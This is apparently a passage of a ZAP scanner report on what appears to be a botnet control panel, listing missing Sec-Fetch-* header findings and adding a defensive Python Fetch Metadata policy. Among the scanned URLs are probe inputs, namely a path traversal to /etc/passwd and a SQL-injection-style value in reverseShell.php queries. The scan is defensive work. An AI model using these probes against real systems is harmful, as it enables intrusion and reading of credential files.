Evidence
Request Header - size: 165 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 152 bytes.
Request Body - size: 0 bytes.
Response Header - size: 275 bytes.
Response Body - size: 27,382 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qifoo.php?file=../../../../../../../etc/passwd
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 290 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 259 bytes.
Response Body - size: 97,496 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 234 bytes.
Response Body - size: 342 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method POST
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 247 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 533 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
Instances 38
Solution
Sec-Fetch-Mode cannot be added by the server. Enforce it instead: a cross-site request with mode navigate, cors or no-cors against a state-changing endpoint is the signature of a CSRF or cross-site read attempt and can be rejected. A missing header means a non-browser client (the loader's bots, curl, this scanner) and has to be tolerated or those clients break.
Reference https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Sec-Fetch-Mode
Tags WSTG-v42-SESS-05
CWE Id 352
WASC Id 9
Plugin Id 90005
Informational
Sec-Fetch-Site Header is Missing
Description
Sec-Fetch-Site specifies the relationship between the request initiator's origin and the target's origin: same-origin, same-site, cross-site, or none for a user-initiated request such as a typed URL or bookmark.
URL http://142.202.242.172
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 148 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 149 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=A
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=D
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=A
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=D
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=A
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=D
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=A
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/robots.txt
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 159 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/sitemap.xml
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 160 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 165 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 152 bytes.
Request Body - size: 0 bytes.
Response Header - size: 275 bytes.
Response Body - size: 27,382 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qifoo.php?file=../../../../../../../etc/passwd
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 290 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 259 bytes.
Response Body - size: 97,496 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 234 bytes.
Response Body - size: 342 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method POST
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 247 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 533 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
Instances 38
Solution
Sec-Fetch-Site is browser-set. Use it as the primary Fetch Metadata signal: allow same-origin, same-site and none (user-initiated navigation), and reject cross-site requests to the panel's endpoints unless they are plain GET navigations. Any client that does not send the header bypasses the check by design, so this complements, and does not replace, CSRF tokens and authentication.
Reference https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Sec-Fetch-Site
Tags WSTG-v42-SESS-05
CWE Id 352
WASC Id 9
Plugin Id 90005
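The four Sec-Fetch-* findings (Dest, Mode, Site, and User below) all point at one control: a server-side resource isolation policy that reads the Fetch Metadata headers the browser sends and refuses cross-site browser requests to the panel. As an added example, not ZAP's text and not the panel's code, the function below implements that policy in the shape documented at web.dev for Fetch Metadata. The panel paths are taken from the report; the decision to protect everything under `/TQUIA729JAULAMJS/` and the sample requests are assumptions constructed for the demo. Note the deliberate pass-through when no header is present: the loader's bots calling gate.php, curl and this scanner send none of these headers, so the policy defends browser users against CSRF and cross-site reads and does nothing against a direct attacker request. It is a complement to authentication and CSRF tokens, not a substitute.

```python
"""Added example: Fetch Metadata resource isolation policy (not code from
the report or the panel). Paths come from the report; the protected prefix
and the sample requests are constructed for the demo."""
from typing import Dict, List, Tuple

# Everything under the panel directory is treated as sensitive (assumption).
PROTECTED_PREFIX = "/TQUIA729JAULAMJS/"


def allow_request(method: str, path: str, headers: Dict[str, str]) -> bool:
    """Return True if the request passes the resource isolation policy."""
    h = {k.lower(): v for k, v in headers.items()}
    site = h.get("sec-fetch-site")
    mode = h.get("sec-fetch-mode")
    dest = h.get("sec-fetch-dest")

    # No Fetch Metadata at all: non-browser client (bots, curl, scanner) or
    # a legacy browser. Fetch Metadata cannot say anything here; let it through
    # and rely on authentication and CSRF tokens for these requests.
    if site is None:
        return True

    # Same-origin, same-site and user-initiated (none) requests are allowed.
    if site in ("same-origin", "same-site", "none"):
        return True

    # From here on the browser has told us the request is cross-site.
    if not path.startswith(PROTECTED_PREFIX):
        return True  # public resources outside the panel are not isolated

    # Permit simple top-level GET navigations so links into the panel work,
    # but not embedding via <object>/<embed> and not cross-site POST/PUT.
    if mode == "navigate" and method.upper() == "GET" and dest not in ("object", "embed"):
        return True

    return False


def evaluate(samples: List[Tuple[str, str, Dict[str, str]]]) -> List[bool]:
    """Run the policy over a list of (method, path, headers) triples."""
    return [allow_request(m, p, hd) for m, p, hd in samples]


# Constructed sample requests against paths that appear in the report.
SAMPLES = [
    # 1. Bot check-in: no Fetch Metadata headers, must pass.
    ("GET", "/TQUIA729JAULAMJS/gate.php?bot=DESKTOP-95IQEEV", {}),
    # 2. Operator clicks a link to the login page from another site: allowed.
    ("GET", "/TQUIA729JAULAMJS/login.php",
     {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "navigate",
      "Sec-Fetch-Dest": "document", "Sec-Fetch-User": "?1"}),
    # 3. Cross-site form POST to login.php (CSRF/login-CSRF shape): rejected.
    ("POST", "/TQUIA729JAULAMJS/login.php",
     {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "navigate",
      "Sec-Fetch-Dest": "document"}),
    # 4. Cross-site fetch() of the dashboard (cross-site read): rejected.
    ("GET", "/TQUIA729JAULAMJS/dashboard.php?id=54",
     {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "cors",
      "Sec-Fetch-Dest": "empty"}),
    # 5. Same-origin POST from the panel's own form: allowed.
    ("POST", "/TQUIA729JAULAMJS/Bots.php?id=54",
     {"Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate",
      "Sec-Fetch-Dest": "document"}),
    # 6. Cross-site <object> embedding of the panel: rejected.
    ("GET", "/TQUIA729JAULAMJS/login.php",
     {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "navigate",
      "Sec-Fetch-Dest": "object"}),
]

if __name__ == "__main__":
    for (m, p, _), ok in zip(SAMPLES, evaluate(SAMPLES)):
        print("ALLOW " if ok else "REJECT", m, p)
```

Deploy this as the first middleware on every panel route and return 403 on a `False`; because the browser, not the attacker's page, sets these headers, a cross-site page cannot forge a same-origin value. Sample 1 is the reminder that the bots and the scanner never carry the headers, which is exactly why ZAP reports every request it made.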
Informational
Sec-Fetch-User Header is Missing
Description
Sec-Fetch-User is sent with the value ?1 only when a navigation request was initiated by user activation (a click or typed URL); it is absent for script- or markup-initiated navigations.
URL http://142.202.242.172
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 148 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 149 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=A
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=D
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=A
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=D
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=A
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=D
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=A
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/robots.txt
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 159 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/sitemap.xml
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 160 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 165 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 698 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 152 bytes.
Request Body - size: 0 bytes.
Response Header - size: 275 bytes.
Response Body - size: 27,382 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 747 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/gate.php?bot=DESKTOP-95IQEEV
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 566 bytes.
Request Body - size: 0 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qifoo.php?file=../../../../../../../etc/passwd
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 290 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 721 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 770 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 259 bytes.
Response Body - size: 97,496 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 705 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 15,024 bytes.
URL http://142.202.242.172/xampp
Method GET
